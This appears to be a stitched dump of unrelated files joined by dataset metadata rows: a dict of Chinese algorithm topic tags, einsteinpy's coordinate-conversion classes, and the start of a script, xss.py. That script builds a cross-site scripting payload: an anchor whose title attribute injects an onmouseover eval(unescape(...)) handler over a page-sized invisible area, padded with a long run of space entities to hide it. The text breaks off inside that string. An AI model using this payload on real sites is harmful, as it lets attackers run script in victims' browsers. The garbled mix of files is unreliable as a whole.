'appearance': None,
'parent': 116,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
119: {
'name': '平面图',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
120: {
'name': '平面图对偶图',
'appearance': None,
'parent': 119,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
121: {
'name': '网格图',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
122: {
'name': '计算几何',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
123: {
'name': '几何向量',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
124: {
'name': '二维凸包',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
125: {
'name': '凸包算法',
'appearance': None,
'parent': 124,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
126: {
'name': '卷包裹法',
'appearance': None,
'parent': 125,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
127: {
'name': '动态凸包',
'appearance': None,
'parent': 125,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
128: {
'name': '三维凸包',
'appearance': None,
'parent': 124,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
129: {
'name': '半平面交',
'appearance': None,
'parent': 124,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
130: {
'name': '旋转卡壳',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
131: {
'name': '三角剖分',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
132: {
'name': 'V图',
'appearance': None,
'parent': 131,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
133: {
'name': '路径规划',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
134: {
'name': '代数',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
135: {
'name': '微积分基础',
'appearance': None,
'parent': 134,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
136: {
'name': 'Simpson积分算法',
'appearance': None,
'parent': 135,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
137: {
'name': '线性代数',
'appearance': None,
'parent': 134,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
138: {
'name': '矩阵基础',
'appearance': None,
'parent': 137,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
139: {
'name': '高斯消元',
'appearance': None,
'parent': 138,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
140: {
'name': '拟阵',
'appearance': None,
'parent': 138,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
141: {
'name': 'Matrix-Tree定理',
'appearance': None,
'parent': 138,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
142: {
'name': '线性递推',
'appearance': None,
'parent': 138,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
143: {
'name': '多项式与幂级数',
'appearance': None,
'parent': 134,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
144: {
'name': 'DFT/FFT',
'appearance': None,
'parent': 143,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
145: {
'name': 'NTT',
'appearance': None,
'parent': 144,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
146: {
'name': 'Bluestein算法',
'appearance': None,
'parent': 144,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
147: {
'name': '多项式基本运算',
'appearance': None,
'parent': 143,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
148: {
'name': '多项式除法',
'appearance': None,
'parent': 147,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
149: {
'name': '多项式基本初等函数',
'appearance': None,
'parent': 147,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
150: {
'name': 'FWT',
'appearance': None,
'parent': 143,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
151: {
'name': '子集变换',
'appearance': None,
'parent': 150,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
152: {
'name': '抽象代数',
'appearance': None,
'parent': 134,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
153: {
'name': '置换群',
'appearance': None,
'parent': 152,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
154: {
'name': 'Schreier-Sims算法',
'appearance': None,
'parent': 153,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
155: {
'name': '数论',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
156: {
'name': '同余和整除',
'appearance': None,
'parent': 155,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
157: {
'name': '欧几里得算法',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
158: {
'name': '扩展欧几里得算法',
'appearance': None,
'parent': 157,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
159: {
'name': '类欧几里得算法',
'appearance': None,
'parent': 157,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
160: {
'name': '欧拉定理',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
161: {
'name': '二次剩余',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
162: {
'name': '原根及离散对数',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
163: {
'name': 'BSGS',
'appearance': None,
'parent': 162,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
164: {
'name': 'lucas定理',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
165: {
'name': '质数与简单数论函数',
'appearance': None,
'parent': 155,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
166: {
'name': '埃氏筛',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
167: {
'name': '欧拉筛',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
168: {
'name': '莫比乌斯反演',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
169: {
'name': '数论函数快速求和',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
170: {
'name': '杜教筛',
'appearance': None,
'parent': 169,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
171: {
'name': '洲阁筛',
'appearance': None,
'parent': 169,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
172: {
'name': '素性测试',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
173: {
'name': 'Miller-Robin',
'appearance': None,
'parent': 172,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
174: {
'name': 'Pollard\'s Rho 因子分解',
'appearance': None,
'parent': 172,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
175: {
'name': '组合计数',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
176: {
'name': '计数原理',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
177: {
'name': '容斥原理',
'appearance': None,
'parent': 176,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
178: {
'name': '计数数列',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
179: {
'name': '斯特林数',
'appearance': None,
'parent': 178,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
180: {
'name': '卡特兰数',
'appearance': None,
'parent': 178,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
181: {
'name': '伯努利数',
'appearance': None,
'parent': 178,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
182: {
'name': '生成函数',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
183: {
'name': '杨氏矩阵',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
184: {
'name': 'Burnside引理',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
185: {
'name': 'Polya定理',
'appearance': None,
'parent': 184,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
186: {
'name': '博弈论与信息论',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
187: {
'name': '博弈基础',
'appearance': None,
'parent': 186,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
188: {
'name': '组合游戏',
'appearance': None,
'parent': 187,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
189: {
'name': '博弈树与DAG模型',
'appearance': None,
'parent': 188,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
190: {
'name': 'Sprague-Grundy函数',
'appearance': None,
'parent': 188,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
191: {
'name': 'Nim',
'appearance': None,
'parent': 188,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
192: {
'name': 'Nim积',
'appearance': None,
'parent': 191,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
193: {
'name': '威佐夫博弈',
'appearance': None,
'parent': 188,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
194: {
'name': '不平等博弈',
'appearance': None,
'parent': 187,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
195: {
'name': '超现实数',
'appearance': None,
'parent': 194,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
196: {
'name': '不完全信息博弈',
'appearance': None,
'parent': 187,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
197: {
'name': '通信与数据压缩',
'appearance': None,
'parent': 186,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
198: {
'name': '校验码',
'appearance': None,
'parent': 197,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
199: {
'name': '哈夫曼编码',
'appearance': None,
'parent': 197,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
200: {
'name': '游程编码',
'appearance': None,
'parent': 197,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
201: {
'name': '形式语言,自动机与串处理',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
202: {
'name': '串处理',
'appearance': None,
'parent': 201,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
203: {
'name': '模式匹配',
'appearance': None,
'parent': 202,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
204: {
'name': 'KMP算法',
'appearance': None,
'parent': 203,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
205: {
'name': 'AC自动机',
'appearance': None,
'parent': 203,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
206: {
'name': 'Shift-And算法',
'appearance': None,
'parent': 203,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
207: {
'name': '字典树',
'appearance': None,
'parent': 202,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
208: {
'name': '后缀树',
'appearance': None,
'parent': 207,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
209: {
'name': '后缀数组',
'appearance': None,
'parent': 208,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
210: {
'name': '后缀自动机',
'appearance': None,
'parent': 208,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
211: {
'name': 'Border',
'appearance': None,
'parent': 202,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
212: {
'name': 'Periodicity引理',
'appearance': None,
'parent': 211,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
213: {
'name': '回文串',
'appearance': None,
'parent': 202,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
214: {
'name': 'manacher算法',
'appearance': None,
'parent': 213,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
215: {
'name': '回文自动机',
'appearance': None,
'parent': 213,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
216: {
'name': '形式语言',
'appearance': None,
'parent': 201,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
217: {
'name': '正则表达式',
'appearance': None,
'parent': 216,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
218: {
'name': '有限状态自动机',
'appearance': None,
'parent': 216,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
219: {
'name': '并行计算',
'appearance': None,
'parent': 201,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
})
AG = tags[1]
DP = tags[2]
NF = tags[15]
EK = tags[20]
DC = tags[24]
LP = tags[25]
FP = tags[27]
GE = tags[28]
DAC = tags[29]
SR = tags[40]
DFS = tags[41]
BFS = tags[42]
AS = tags[44]
ID = tags[45]
MIM = tags[46]
RAN = tags[47]
HS = tags[54]
DS = tags[55]
STK = tags[56]
QUE = tags[57]
HST = tags[58]
HP = tags[59]
BST = tags[62]
THP = tags[63]
SPT = tags[64]
RBT = tags[65]
SGT = tags[66]
BIT = tags[67]
SGM = tags[68]
UFS = tags[70]
ST = tags[74]
KDT = tags[75]
DCT = tags[77]
LCT = tags[78]
ETT = tags[79]
GT = tags[82]
PM = tags[84]
KS = tags[85]
DJ = tags[91]
BFD = tags[92]
FL = tags[94]
BCC = tags[97]
SCC = tags[98]
KM = tags[101]
BL = tags[103]
GS = tags[106]
CG = tags[122]
AB = tags[134]
FT = tags[144]
FWT = tags[150]
NT = tags[155]
MR = tags[173]
CE = tags[175]
GF = tags[182]
GI = tags[186]
SG = tags[190]
NIM = tags[191]
FAS = tags[201]
STR = tags[202]
KMP = tags[204]
TRI = tags[207]
SA = tags[209]
SAM = tags[210]
PAM = tags[215]
RE = tags[217]
DFA = tags[218]
| 14.05196
| 33
| 0.450081
| 4,417
| 47,327
| 4.822504
| 0.122481
| 0.144594
| 0.206563
| 0.299516
| 0.826111
| 0.825454
| 0.825454
| 0.825454
| 0.825454
| 0.825454
| 0
| 0.072239
| 0.321994
| 47,327
| 3,367
| 34
| 14.056133
| 0.591592
| 0
| 0
| 0.62218
| 0
| 0
| 0.402411
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1092a8a7cbb969312c3237b7a219d3037f2ccbdc
| 9,308
|
py
|
Python
|
src/einsteinpy/coordinates/core.py
|
bibek22/einsteinpy
|
78bf5d942cbb12393852f8e4d7a8426f1ffe6f23
|
[
"MIT"
] | 2
|
2019-04-07T04:01:57.000Z
|
2019-07-11T11:59:55.000Z
|
src/einsteinpy/coordinates/core.py
|
bibek22/einsteinpy
|
78bf5d942cbb12393852f8e4d7a8426f1ffe6f23
|
[
"MIT"
] | null | null | null |
src/einsteinpy/coordinates/core.py
|
bibek22/einsteinpy
|
78bf5d942cbb12393852f8e4d7a8426f1ffe6f23
|
[
"MIT"
] | null | null | null |
import astropy.units as u
import numpy as np
from einsteinpy.coordinates.conversion import (
BoyerLindquistConversion,
CartesianConversion,
SphericalConversion,
)
class Cartesian(CartesianConversion):
"""
Class for Cartesian Coordinates and related transformations.
"""
@u.quantity_input(x=u.km, y=u.km, z=u.km)
def __init__(self, x, y, z):
"""
Constructor.
Parameters
----------
x : ~astropy.units.quantity.Quantity
y : ~astropy.units.quantity.Quantity
z : ~astropy.units.quantity.Qauntity
"""
self.x = x
self.y = y
self.z = z
super().__init__(x.si.value, y.si.value, z.si.value)
self.system = "Cartesian"
self._dimension = {"x": self.x, "y": self.y, "z": self.z, "system": self.system}
self._dimension_order = ("x", "y", "z")
def __repr__(self):
return "Cartesian x: {}, y: {}, z: {}".format(self.x, self.y, self.z)
def __str__(self):
return self.__repr__()
def __getitem__(self, item):
"""
Method to return coordinates.
Objects are subsctiptable with both explicit names of parameters
and integer indices.
Parameters
----------
item : str or int
Name of the parameter or its index.
If ``'system'``, Name of coordinate is returned.
"""
if isinstance(item, (int, np.integer)):
return self._dimension[self._dimension_order[item]]
return self._dimension[item]
def si_values(self):
"""
Function for returning values in SI units.
Returns
-------
~numpy.ndarray
Array containing values in SI units (m, m, m)
"""
element_list = [self.x.to(u.m), self.y.to(u.m), self.z.to(u.m)]
return np.array([e.value for e in element_list], dtype=float)
def norm(self):
"""
Function for finding euclidean norm of a vector.
Returns
-------
~astropy.units.quantity.Quantity
Euclidean norm with units.
"""
return np.sqrt(self.x ** 2 + self.y ** 2 + self.z ** 2)
def dot(self, target):
"""
Dot product of two vectors.
Parameters
----------
target: ~einsteipy.coordinates.core.Cartesian
Returns
-------
~astropy.units.quantity.Quantity
Dot product with units
"""
x = self.x * target.x
y = self.y * target.y
z = self.z * target.z
return x + y + z
def to_spherical(self):
"""
Method for conversion to spherical coordinates.
Returns
-------
~einsteinpy.coordinates.core.Spherical
Spherical representation of the Cartesian Coordinates.
"""
r, theta, phi = self.convert_spherical()
return Spherical(r * u.m, theta * u.rad, phi * u.rad)
@u.quantity_input(a=u.km)
def to_bl(self, a):
"""
Method for conversion to boyer-lindquist coordinates.
Parameters
----------
a : ~astropy.units.quantity.Quantity
a = J/Mc , the angular momentum per unit mass of the black hole per speed of light.
Returns
-------
~einsteinpy.coordinates.core.BoyerLindquist
BL representation of the Cartesian Coordinates.
"""
r, theta, phi, a = self.convert_bl(a.si.value)
return BoyerLindquist(r * u.m, theta * u.rad, phi * u.rad, a * u.m)
class Spherical(SphericalConversion):
"""
Class for Spherical Coordinates and related transformations.
"""
@u.quantity_input(r=u.km, theta=u.rad, phi=u.rad)
def __init__(self, r, theta, phi):
"""
Constructor.
Parameters
----------
r : ~astropy.units.quantity.Quantity
theta : ~astropy.units.quantity.Quantity
phi : ~astropy.units.quantity.Quantity
"""
self.r = r
self.theta = theta
self.phi = phi
super().__init__(r.si.value, theta.si.value, phi.si.value)
self.system = "Spherical"
self._dimension = {
"r": self.r,
"theta": self.theta,
"phi": self.phi,
"system": self.system,
}
self._dimension_order = ("r", "theta", "phi")
def __repr__(self):
return "Spherical r: {}, theta: {}, phi: {}".format(
self.r, self.theta, self.phi
)
def __str__(self):
return self.__repr__()
def __getitem__(self, item):
"""
Method to return coordinates.
Objects are subsctiptable with both explicit names of parameters
and integer indices.
Parameters
----------
item : str or int
Name of the parameter or its index.
If ``'system'``, Name of coordinate is returned.
"""
if isinstance(item, (int, np.integer)):
return self._dimension[self._dimension_order[item]]
return self._dimension[item]
def si_values(self):
"""
Function for returning values in SI units.
Returns
-------
~numpy.ndarray
Array containing values in SI units (m, rad, rad)
"""
element_list = [self.r.to(u.m), self.theta.to(u.rad), self.phi.to(u.rad)]
return np.array([e.value for e in element_list], dtype=float)
def to_cartesian(self):
"""
Method for conversion to cartesian coordinates.
Returns
-------
~einsteinpy.coordinates.core.Cartesian
Cartesian representation of the Spherical Coordinates.
"""
x, y, z = self.convert_cartesian()
return Cartesian(x * u.m, y * u.m, z * u.m)
@u.quantity_input(a=u.km)
def to_bl(self, a):
"""
Method for conversion to boyer-lindquist coordinates.
Parameters
----------
a : ~astropy.units.quantity.Quantity
a = J/Mc , the angular momentum per unit mass of the black hole per speed of light.
Returns
-------
~einsteinpy.coordinates.core.BoyerLindquist
BL representation of the Spherical Coordinates.
"""
r, theta, phi, a = self.convert_bl(a.si.value)
return BoyerLindquist(r * u.m, theta * u.rad, phi * u.rad, a * u.m)
class BoyerLindquist(BoyerLindquistConversion):
"""
Class for Spherical Coordinates and related transformations.
"""
@u.quantity_input(r=u.km, theta=u.rad, phi=u.rad, a=u.km)
def __init__(self, r, theta, phi, a):
"""
Constructor.
Parameters
----------
r : ~astropy.units.quantity.Quantity
theta : ~astropy.units.quantity.Quantity
phi : ~astropy.units.quantity.Quantity
a : ~astropy.units.quantity.Quantity
"""
self.r = r
self.theta = theta
self.phi = phi
self.a = a
super().__init__(r.si.value, theta.si.value, phi.si.value, a=a.si.value)
self.system = "BoyerLindquist"
self._dimension = {
"r": self.r,
"theta": self.theta,
"phi": self.phi,
"a": self.a,
"system": self.system,
}
self._dimension_order = ("r", "theta", "phi")
def __repr__(self):
return "Boyer-Lindquist r: {}, theta: {}, phi: {} | a: {}".format(
self.r, self.theta, self.phi, self.a
)
def __str__(self):
return self.__repr__()
def __getitem__(self, item):
"""
Method to return coordinates.
Objects are subsctiptable with both explicit names of parameters
and integer indices.
Parameters
----------
item : str or int
Name of the parameter or its index.
If ``'system'``, Name of coordinate is returned.
If ``'a'``, spin factor of the body, ``self.a`` is returned.
"""
if isinstance(item, (int, np.integer)):
return self._dimension[self._dimension_order[item]]
return self._dimension[item]
def si_values(self):
"""
Function for returning values in SI units.
Returns
-------
~numpy.ndarray
Array containing values in SI units (m, rad, rad)
"""
element_list = [self.r.to(u.m), self.theta.to(u.rad), self.phi.to(u.rad)]
return np.array([e.value for e in element_list], dtype=float)
def to_cartesian(self):
"""
Method for conversion to cartesian coordinates.
Returns
-------
~einsteinpy.coordinates.core.Cartesian
Cartesian representation of the BL Coordinates.
"""
x, y, z = self.convert_cartesian()
return Cartesian(x * u.m, y * u.m, z * u.m)
def to_spherical(self):
"""
Method for conversion to spherical coordinates.
Returns
-------
~einsteinpy.coordinates.core.Spherical
Spherical representation of the BL Coordinates.
"""
r, theta, phi = self.convert_spherical()
return Spherical(r * u.m, theta * u.rad, phi * u.rad)
| 27.951952
| 95
| 0.549098
| 1,081
| 9,308
| 4.617946
| 0.111933
| 0.006811
| 0.05609
| 0.072917
| 0.807692
| 0.785857
| 0.771034
| 0.7502
| 0.746194
| 0.746194
| 0
| 0.000477
| 0.32456
| 9,308
| 332
| 96
| 28.036145
| 0.793542
| 0.37312
| 0
| 0.59292
| 0
| 0
| 0.044397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.20354
| false
| 0
| 0.026549
| 0.053097
| 0.460177
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1093c6788d398eed0cd86a02950ab3b756ff35c4
| 65,891
|
py
|
Python
|
xss-1/xss.py
|
beelzebielsk/csc59938-week-7
|
3bacecfe57af0d2d900c9a69a788cae6d027865d
|
[
"Apache-2.0"
] | null | null | null |
xss-1/xss.py
|
beelzebielsk/csc59938-week-7
|
3bacecfe57af0d2d900c9a69a788cae6d027865d
|
[
"Apache-2.0"
] | null | null | null |
xss-1/xss.py
|
beelzebielsk/csc59938-week-7
|
3bacecfe57af0d2d900c9a69a788cae6d027865d
|
[
"Apache-2.0"
] | null | null | null |
import sys
from urllib.parse import quote_plus;
badString = "<a title=' onmouseover=eval(unescape(/{}/.source)) style=position:absolute;left:0;top:0;width:50000px;height:50000px                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        